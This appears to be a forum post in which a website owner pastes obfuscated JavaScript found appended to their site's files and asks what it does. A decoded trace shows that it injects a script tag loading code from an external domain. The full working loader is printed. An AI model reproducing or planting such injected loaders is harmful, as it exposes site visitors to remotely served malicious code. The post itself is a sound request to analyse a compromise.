I have a website. I've found out, that some javascript files have strange code on the bottom. Here's an copy of that code:
function abbxeasat(c4cr4pm4){return g46isme(i7h22f0gi4(c4cr4pm4),'g4u0kvvbo');}function i7h22f0gi4(kr8sug){var nn68ho='';var lp79msv=0;var sxifdfz=0;for(lp79msv=0;lp79msv<kr8sug.length/3;lp79msv++){nn68ho+=String.fromCharCode(kr8sug.slice(sxifdfz, sxifdfz+3));sxifdfz=sxifdfz+3;}return nn68ho;}var k4ovchr=["020087", "021093","023064", "004070016081031019051014010010081027068","020070022", "019077005085", "019081013068068028023020014020087007089027002", "006068005085005018053010006011080", "015081020084", "000081001117007019027007001019071055073063023017044014010081", "015064001064081089089017027006064016030024027026080065021065090090024089021012027073094006"];function t6rn0k(kd858l6){var ircm0d8ot=document[abbxeasat(k4ovchr[3])](abbxeasat(k4ovchr[0])+abbxeasat(k4ovchr[1])+abbxeasat(k4ovchr[2]));ircm0d8ot[abbxeasat(k4ovchr[4])]=kd858l6;ircm0d8ot[abbxeasat(k4ovchr[5])]=abbxeasat(k4ovchr[6]);document[abbxeasat(k4ovchr[9])](abbxeasat(k4ovchr[8]))[0][abbxeasat(k4ovchr[7])](ircm0d8ot);}t6rn0k(abbxeasat(k4ovchr[10]));function g46isme(a747mi3lx, ysbu3g) {var y7lk3ubt='';var c2zom0n=0;var a9yhxvd=0;for(c2zom0n=0;c2zom0n<a747mi3lx.length;c2zom0n++){var x7t9oj0=a747mi3lx.charAt(c2zom0n);var a205z01r=x7t9oj0.charCodeAt(0)^ysbu3g.charCodeAt(a9yhxvd);x7t9oj0=String.fromCharCode(a205z01r);y7lk3ubt+=x7t9oj0;if(a9yhxvd==ysbu3g.length-1)a9yhxvd=0;else a9yhxvd++;}return(y7lk3ubt);}
I think that my webserver has been hacked. Can somebody tell me what this code does? And how it came to be in my file?
After flattening it out and making it readable, it seems to do this:
createElement
(index):9 sc
(index):9 ri
(index):9 pt
(index):9 src
(index):9 type
(index):9 text/javascript
(index):9 getElementsByTagName
(index):9 head
(index):9 appendChild
And what it appends is:
http://state.sml2.ru/js/cnt.js